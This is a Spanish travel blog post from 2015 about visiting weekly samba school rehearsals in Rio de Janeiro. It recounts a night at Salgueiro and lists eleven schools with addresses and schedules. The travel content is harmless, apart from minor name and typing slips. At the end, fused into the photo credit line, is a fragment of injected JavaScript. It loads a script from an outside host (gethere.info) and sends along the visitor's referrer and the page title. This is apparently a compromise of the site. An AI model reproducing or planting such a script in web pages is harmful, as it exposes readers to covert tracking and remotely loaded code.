Haciendo los deberes en las escuelas de samba de Rio de Janeiro

25/11/2015

 

Carnaval en Rio de Janeiro escuelas de samba

Cierto es que no existe nada mejor que el espectacular Carnaval de Río de Janeiro, con esa extravagancia que lleva por bandera, con sus cientos de miles de brasileños atestando escandalosamente las calles y el Sambódromo y, claro está, la música y el baile de samba que ayudan a concebir esta fiesta como un todo, dándole forma. Sin embargo, no todos tenemos el privilegio de poder volar a Río durante esa mágica semana de febrero (en 2016, en los días del 5 al 9) o, sencillamente, de hacer frente a los precios que la acompañan.

Eso sí, aquí va una buena noticia: cualquiera puede saborear la magnífica experiencia de asistir a los eléctricos ensaios que tienen lugar cada semana al comenzar el verano (recuerda que hablamos del hemisferio sur) en las sedes de las 26 escuelas de samba de la ciudad, esos clubs sociales afincados en cada barrio que se han convertido en el alma de este imponente desfile anual de samba desde la década de 1920. Cuál de ellos elijas depende de ciertos factores: Mangueira y Portela son los más admirados, pues se fundaron hace ya casi un siglo; São Clemente es uno de los más recomendables para turistas, al estar ubicado en el centro de la ciudad; hay otros, por ejemplo, que cuentan con unas características peculiares que seguro te resultarán atractivas, y que puedes consultar aquí: y otros, incluso, se ubican en zonas un poco más inseguras, por lo que te sería bueno que te informaras bien.

Brasil-Rio-Janeiro_Escuela_Samba_SalgueiroEn mi reciente regreso a Rio decidí quedar con algunos amigos de esta ciudad el sábado por la noche para disfrutar de los segundos ensayos de escuelas de samba que he tenido el honor de presenciar; por supuesto, fue uno de los momentos cumbre del viaje. La escuela que elegimos fue Salgueiro, fundada en 1953 y que actualmente disfruta de una gran reputación por ser una de las más glamurosas, también por ser una de las que más ha respetado la herencia afrobrasileña. Está ubicada en un barrio bastante seguro, aunque algo alejado de donde se encuentran la mayoría de hoteles en las zonas de Copacabana, Ipanema y Leblon. Desde el mío, el Sheraton Rio de Leblon, fueron treinta minutos de trayecto por los que pagué sesenta reales.

Atravesando su gigantesca fachada ataviada con los colores rojo y blanco, los típicos de esta escuela, pagamos una entrada de 30 reales (alrededor de 7,5€): fue entonces cuando llegamos a un enorme salón rectangular que me llamó la atención por su techo sofocante y personalizado con un damero rojo y blanco y que ya estaba lleno de gente esperando de pie delante del escenario, con mesas a cada lado y rodeado por diversos vendedores de cervezas, licores y snacks.

TEscuela_Samba_Salgueiro_Rio_Janeiro_Brasil_David-Paul-Appellodo el mundo allí lo estaba pasando en grande, e incluso había quienes subían al escenario junto a un grupo de chicos jóvenes para, de un modo un tanto enérgico, tocar los tambores y cantar a voz en grito un repertorio de canciones de pop actuales. Un poco más tarde, alrededor de la 1 de la madrugada, se puso en marcha el evento principal, la presentación de los diferentes elementos con los que Salgueiro estará desfilando por el Sambódromo el próximo mes de febrero. Es aquí cuando vimos a las baianas (chicas jóvenes y muy flexibles ataviadas con vestimentas diminutas), a los chulos y a otros personajes basados en la melodía seleccionada por la escuela para 2016: A Ópera dos Malandros, célebre musical escrito en el año 1978 por uno de los grandes genios de la música barasileña, Chico Buarque, e inspirado en la obra ‘La ópera de los tres centavos’ de los alemanes Beltort Brecht y Kurt Weil.

En una plataforma que estaba a nuestras espaldas le llegó el turno a Bateria Furiosa, una sección rítmica que, bajo la dirección del Mestre (Maestro) Marcão, sacudió de nuevo el ambiente y canturreó con gran habilidad; y sí, como no podía ser menos, también de una manera sobradamente furiosa. Finalmente, otro grupo de artistas subió al escenario para presentar el plato fuerte de la noche: la canción de samba de Salgueiro para 2016, que la gente allí congregada pudimos seguir gracias a que nos habían entregado una copia de las letras (puedes ver el vídeo oficial de la canción de la escuela en este enlace):

Ê, filho da sorte eu sou
Vento sopra a meu favor
Gira sorte, gira mundo, malandro deixa girar
Quem dá as cartas sou eu, pode apostar!

Eh, soy hijo de la fortuna
El viento sopla a mi favor
Gira la suerte, gira el mundo, el canalla deja de girar
Quien da las cartas soy yo, ¡puedes apostar!

Mientras cantaba este grupo sobre el escenario, Bateria Furiosa volvió a la acción para acompañarlo, y fue en ese preciso momento cuando me ocurrió una cosa muy extraña: la estimulación auditiva que me estaba llegando desde todos lados era tan divertida que, tras unos minutos, sentí como si fuera a desmayarme. Fue una experiencia realmente intensa. Todavía quedaba mucha noche por disfrutar, pero este novato ya había disfrutado lo suficiente. Eso sí, ¡no creo que me perdiera nada que no hubiera visto ya!

Echa un vistazo a las once principales escuelas de samba que abren al público sus ensayos nocturnos en los meses previos al Carnaval y adéntrate en lo más profundo del espíritu de la samba; vale, es posible que falten las carrozas y que otros sonidos característicos del evento no estén presentes aquí, pero resulta verdaderamente increíble formar parte de la felicidad que irradia este género musical y presenciar tamaño espectáculo. Y, claro, Iberia te lleva hasta Rio y otros destinos de Brasil con vuelos desde el Reino Unido y desde otras ciudades europeas vía Madrid.

Beija-Flor Rua Pracinha Wallace Paes Leme 1025, Nilópolis – Jueves9 pm

Grande Rio Rua Colégio São José, Av. Presidente Kennedy, Duque de Caxias – Viernes 10 pm

Imperatriz Leopoldinense Rua Professor Lacê 235, Ramos – Domingo 8 pm

Mangueira Rua Visconde de Niterói 1072, Mangueira – Sábado 10 pm

Mocidade Rua Coronel Tamarindo 38 – Padre Miguel – Sábado 10 pm

Portela Rua Clara Nunes 81 – Madureira – Wednesday 8pm, Viernes 10 pm

Salgueiro Rua Silva Teles 104 – Tijuca – Sábado 10 pm

São Clemente Av. Presidente Vargas 3102 – Centro – Martes 8 pm, Sábado 10pm

União da Ilha Estrada do Galeão 322, Ilha do Governador – Martes 8 pm, Sábado 10 pm

Unidos da Tijuca Clube dos Portuários, Avenida Francisco Bicalho 47, São Cristóvão – Viernes/Sábado 20:8 pm

Vila Isabel Av. 28 de Setembro 382 – Vila Isabel – Martes 8 pm, Sábado 10 pm

fotos | Shutterstock, DPAs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO